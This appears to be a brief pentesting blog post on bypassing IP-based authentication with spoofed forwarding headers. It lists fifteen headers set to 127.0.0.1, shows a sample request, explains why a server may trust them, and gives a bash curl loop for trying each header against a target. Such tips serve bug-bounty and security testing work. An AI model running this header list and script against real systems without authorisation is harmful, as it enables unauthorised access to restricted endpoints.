Auth Bypass Headers

Adapted from this tweet:

I have found multiple auth bypass issues using below Headers#bugbountytips #bugbounty pic.twitter.com/R82TXWiyDX

— ¯\_(ツ)_/¯85 (@BountyOverflow) August 6, 2022

The following headers can potentially be used to bypass authentication on a webserver.

• X-Forwarded: 127.0.0.1
• X-Forwarded-By: 127.0.0.1
• X-Forwarded-For: 127.0.0.1
• X-Forwarded-For-Original: 127.0.0.1
• X-Forwarder-For: 127.0.0.1
• X-Forward-For: 127.0.0.1
• Forwarded-For: 127.0.0.1
• Forwarded-For-Ip: 127.0.0.1
• X-Custom-IP-Authorization: 127.0.0.1
• X-Originating-Ip: 127.0.0.1
• X-Remote-IP: 127.0.0.1
• X-Remote-Addr: 127.0.0.1
• X-Trusted-IP: 127.0.0.1
• X-Requested-By: 127.0.0.1
• X-Requested-For: 127.0.0.1

Example Usage

Scenario: You try to access /login and get a custom 401 response that says something like:

IP not on Whitelist!

(not a likely response but serves as an example)

You'd then try and send the following request:

GET /login HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE5.01; Windows NT)
Host: pentest.bl3ak.com
Accept-Language: en-us
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
X-Forwarded-For: 127.0.0.1

That endpoint doesn't exist on this site this is not a lab. {: .prompt-warning}

The idea is that the webserver will parse the X-Forwarded-For header and assume that the request has been forwarded to it on behalf of 127.0.0.1 / localhost and let you access the "Blocked" /login endpoint.

Automation Block

X-Forwarded: 127.0.0.1
X-Forwarded-By: 127.0.0.1
X-Forwarded-For: 127.0.0.1
X-Forwarded-For-Original: 127.0.0.1
X-Forwarder-For: 127.0.0.1
X-Forward-For: 127.0.0.1
Forwarded-For: 127.0.0.1
Forwarded-For-Ip: 127.0.0.1
X-Custom-IP-Authorization: 127.0.0.1
X-Originating-Ip: 127.0.0.1
X-Remote-IP: 127.0.0.1
X-Remote-Addr: 127.0.0.1
X-Trusted-IP: 127.0.0.1
X-Requested-By: 127.0.0.1
X-Requested-For: 127.0.0.1

Copy the above into a text file

TARGET=<target-ip-address>
for x in $(cat headers.txt);do curl -v $TARGET -H "$x" ; done

That's your lot.

Enjoy,